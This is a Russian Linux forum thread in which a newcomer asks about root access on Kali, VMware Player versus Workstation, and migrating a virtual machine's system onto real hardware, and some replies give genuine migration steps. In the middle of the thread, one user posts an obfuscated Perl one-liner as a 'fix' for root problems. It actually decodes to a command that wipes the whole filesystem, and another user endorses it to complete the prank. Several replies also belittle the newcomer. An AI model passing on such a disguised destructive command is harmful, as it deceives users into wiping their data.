LINUX.ORG.RU
Ответ на: комментарий от anonymous

а, station конечно VMware® Workstation 12 Pro 12.5.9 build-7535481 Лицензирована Пакетное Без срока действия Windows 7 Enterprise, 64-bit 6.1.7601, Service Pack 1

cpanewbie
() автор топика
Ответ на: комментарий от cpanewbie

Объясни чем отличается перенос установленной системы с одного ПК на другой от переноса из виртуалки?

Для загрузки что Linux, что Windows нужно что бы запускался загрузчик, а далее запускаемое ядро операционной системы могло загрузить драйверы для файловой системы, где установлена операционная система, ну и раздел который должен монтироваться в качестве системного тоже должен правильно быть указан.

В случае Windows и Linux включение соответствующих драйверов, указание системного раздела и настройка загрузчика делается по разному, но всё это можно сделать.

Объяснять конкретные команды никто здесь не будет, если нужно - вперёд в гугл.

anonymous
()
Ответ на: комментарий от Moondancer

Он неуодобен интерфейсом, сравни его с воркстейшн или виртуалбокс.

Неодобно управлять сразу несколькими виртуальными машинами, в воркстейшн как и в виртуалбокс буден одно окно со списком машин по которым даже во время запуска их можно переключаться и управлять, в плеере же каждая машина запускается в отдельном окне и что бы управлять другой нужно делать альт-таб.

В общем, просто поработай и сравни.

anonymous
()

эээ.. ты ничо не путаешь? покажи ка мне как bootmgr грузит кучу .vmdk. и еще типов 5 файлов, ага. разананимься, клован, дай запомнить тебя

cpanewbie
() автор топика

sudo nano /etc/apt/sources.list

попробуй

Shulman
()
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Проблема рута обычно решается этой командой из-под рута. После её выполнения ты увидишь, где лучше рутом пользоваться, а где - обычным пользователем.

Quasar ★★★★★
()
Последнее исправление: Quasar (всего исправлений: 1)

в нем безгеморройный прямой рут

su твой_пароль_рута

без него я не заведу старые версии ффокса

Не ври

тупо если видосы смотреть. не вернуться к найденному раньше, ни к сессиям, ни к группам, ни вкладкам.

Не ври

но блин, где редактор???

Вали с кали, на нормальные дистрибутивы, кали это вообще не для постоянного использования

Deleted
()
Ответ на: комментарий от Quasar

Я думаю ты решил его проблему и мы его больше не увидим какое то время. К слову данный фикс мне предложили в 2014 году, я действительно многое понял, было непривычно и непонятно в начале, но потом всё встало на свои места.

Deleted
()
Последнее исправление: Deleted (всего исправлений: 1)
Ответ на: комментарий от Deleted

Не ври

да я ставил в минте в opt, но под судой или ече чем. имхо проще спод рута перелогиниться в пользователя что бы работать со своим home, и без гемороя сразу поставить home без uid gid . для меня вообще линуксовая среда и пользование им дискомфортно, только что попробовать скомпилить кернел андроеда ставлю.

cpanewbie
() автор топика

для меня вообще линуксовая среда и пользование им дискомфортно

Тогда тебе не стоит на форумы по линуксу ходить, и уж тем более не стоит тебе линукс использовать ни в каком виде.

Quasar ★★★★★
()

Ля, ну давай мериться кто насколько дольше начал пользоваться, я в 2008 и что дальше?

Я высказал моё мнение, player неудобен по сравнению с workstation или virtualbox. Интерфейс в нём менее удобен, типовые операции проще делать в workstation или virtualbox, в player их тоже можно делать, за исключением снапшотов, но в силу немного другого интерфейса нужно делать больше кликов мышью.

Поэтому мне player неудобен.

anonymous
()

А я тебе не предлагаю грузить vmdk, делай обычный перенос системы из виртуального диска на физический.

anonymous
()

Ты зажрался: дали ему бесплатное решение, полноценно работающее, а он нос воротит и визжит, что кликов больше делать надо. Заведи себе автокликалку, мышевоз.

Moondancer
()

делай обычный перенос системы из виртуального диска на физический.
не предлагаю грузить vmdk

ан...ист, я уже спрашивал у тебя пруф разобрать vmdk файл, и как его «перенести» на железо систему из этого файла. это vhd с которого грузится >7

cpanewbie
() автор топика

Пля, я virtualbox использую и KVM + libvirt + virsh вместе со spice.

Ни Vmware Player ни Vmware Workstation мне не нужны.

Рядом стоит сервер c Vmware ESXI 6.5.

Ты не понятно что мне доказываешь и зачем.

А вообще с таким высказываниями смотри что бы не забанили.

anonymous
()

Поэтому мне player неудобен

если б только неудобство. он нефункционален.

cpanewbie
() автор топика

разобрать vmdk файл, и как его «перенести» на железо систему из этого файла [/qiote] ntfsclone для сохранения и восстановления файловых систем, если у тебя там Windows, fdisk для создания разделов на целевом железе.

А далее грузишься с установочного диска Windows или WinPE и обновляешь код загрузчика и конфиг BCD.DAT

Через fdsisk не забудь проставить такой же ID диска, как и в виртуалке.

Для Linux вообще tar и далее chroot и правка /etc/fstab.

anonymous
()

я же напиал - ПРУФ. а твои домыслы чота мне не вставляют - vmdk это файл, с метаданными, это даже не образ iso

cpanewbie
() автор топика

virtualbox использую

Он уже научился полные проекты от вмвари импортировать (не только диски)? Я как раз в те годы с какого-то японского сайта качал готовые установленные виртуалки с разными осями; он мёртвый давно.

KVM + libvirt

На винде?!

Ты не понятно что мне доказываешь и зачем.

Я доказываю, что VMware Player можно пользоваться, хотя ты почему-то имплаишь, что если человек пользуется VMware, то именно Workstation.

с таким высказываниями смотри что бы не забанили

Нашёл чем рецидивиста пугать :D

Moondancer
()

Грузишься в виртуалке с iso образо LiveCD Linux и выполняешь описанные действия.

Я тебе не предлагаю оперировать напрямую VMDK файлом, а производить действия как на обычном компе.

anonymous
()

н уже научился полные проекты от вмвари импортировать (не только диски)

Зачем?

На винде?!

У меня Linux. А на винде есть Virtualbox.

что если человек пользуется VMware, то именно Workstation.

Он сам написал что WorkStation, да и по его вопросам можно предположить, что он будет именно его использовать.

anonymous
()

да надо, в смысле хочу, пересобрать один-другой андроедвский кернел.

Хоти дальше. В линукс зачем лезть, если он тебе не нравится? С теми претензиями, которые ты тут описал, ты даже helloworld.c не соберёшь. У тебя способностей недостаточно.

Quasar ★★★★★
()

Да не лезь ты в эту область. Всё равно ничего не сможешь. Компьютеры - это не твоё.

Quasar ★★★★★
()

так ступай мимо, чо ты здесь забыл?

Это форум по свободному ПО и линуксу. Мне положено тут находиться. А ты что здесь забыл?

Quasar ★★★★★
()

Что ты несёшь? Я тебе что написал:

ntfsclone для сохранения и восстановления файловых систем, если у тебя там Windows, fdisk для создания разделов на целевом железе.

А далее грузишься с установочного диска Windows или WinPE и обновляешь код загрузчика и конфиг BCD.DAT

Через fdsisk не забудь проставить такой же ID диска, как и в виртуалке.

Вот грузишься в виртуалке с LiveCD Linux и делаешь действия по сохранению файловых систем или сжатию установленного Linux, потом на реальном железе опять таки загрузившись с LiveCD восстанавливаешь файловые системы / распаковываешь Linux. И далее по пунктам.

anonymous
()

Более такому упрямому и не желающему учиться мне сказать нечего.

А зря. После выполнения квеста по разблокированию и переходу под рута можно сразу предлагать патч Бармина.

(Шучу-шучу.)

hobbit ★★★★★
()

Не пытайся ему объяснить - у него недостаточно способностей для того, чтобы эти элементарные вещи понять.

Quasar ★★★★★
()
Ответ на: комментарий от Quasar

свободное ПО и линукс

а твоя оценка уровня знаний и спосбностей (или неспособностей) форумчан кагбэ вне рамок тематики форума, или не?

cpanewbie
() автор топика

а твоя оценка уровня знаний и спосбностей (или неспособностей) форумчан кагбэ вне рамок тематики форума, или не?

Вообще-то тебе прямой вопрос был поставлен: что ты здесь забыл? Отвечай и не пытайся увильнуть. Ты прямо написал, что линукс тебе неудобен и не нужен.

Quasar ★★★★★
()

Вот грузишься в виртуалке с LiveCD Linux и делаешь действия по сохранению файловых систем или сжатию установленного Linux, потом на реальном железе опять таки загрузившись с LiveCD восстанавливаешь файловые системы / распаковываешь Linux

ан-ст, а на хрена это надо?

cpanewbie
() автор топика

Если ты сам не понимаешь, зачем, то ты даже helloworld.c не сможешь скомпилировать - куда уж ядро андроида.

Quasar ★★★★★
()

только что попробовать скомпилить кернел андроеда ставлю.

Тогда точно лучше не Кали, а что-нибудь менее специфичное.

hobbit ★★★★★
()
Ответ на: комментарий от hobbit

точно лучше не Кали

м.б.

щас некогда, убегаю оффлайн

cpanewbie
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.